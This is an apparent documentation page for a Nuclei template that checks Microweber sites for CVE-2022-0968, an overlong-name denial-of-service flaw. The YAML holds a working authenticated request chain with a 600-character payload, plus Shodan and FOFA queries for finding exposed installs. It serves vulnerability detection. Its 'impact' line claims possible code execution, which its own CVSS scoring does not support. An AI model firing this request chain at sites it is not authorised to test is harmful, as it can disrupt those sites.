Microweber <1.2.12 - Integer Overflow
ID: CVE-2022-0968
Severity: medium
Author: amit-jd
Tags: cve,cve2022,overflow,microweber,cms,huntr,dos
Description
Microweber before 1.2.12 is susceptible to integer overflow. The application accepts an excessively large number of characters in the 'first & last name' input fields, which can allow an attacker to cause a denial of service via a crafted HTTP request.
YAML Source
id: CVE-2022-0968

info:
  name: Microweber <1.2.12 - Integer Overflow
  author: amit-jd
  severity: medium
  description: |
    Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or denial of service.
  remediation: First name and last name input should be limited to 50 characters or maximum 100 characters.
  reference:
    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
    - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
    - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 5.5
    cve-id: CVE-2022-0968
    cwe-id: CWE-190
    epss-score: 0.00076
    epss-percentile: 0.32297
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2022,overflow,microweber,cms,huntr,dos
variables:
  payload: '{{repeat("A", 600)}}'

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/user/2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=

    matchers:
      - type: dsl
        dsl:
          - contains(body_3,'\"first_name\":\"{{payload}}\"')
          - 'status_code_3==200'
          - 'contains(header_3,"application/json")'
        condition: and

    extractors:
      - type: regex
        name: form_token
        group: 1
        regex:
          - '<input type="hidden" name="token" value="(.*)" autocomplete="off">'
        internal: true
        part: body

      - type: regex
        name: user
        group: 1
        regex:
          - '<input type="text" class="form-control" name="username" value="(.*)">'
        internal: true
        part: body

      - type: regex
        name: email
        group: 1
        regex:
          - '<input type="email" class="form-control" name="email" value="(.*)">'
        internal: true
        part: body
# digest: 490a00463044022036e2cd79541f5332dcb733fe080d4dfe095a55bdd584afc0c21f570b73e5b5270220704306aca46b6be8560b1fe276ec600eb71245fad69aa1050a4a7f1a29f138fa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0968.yaml"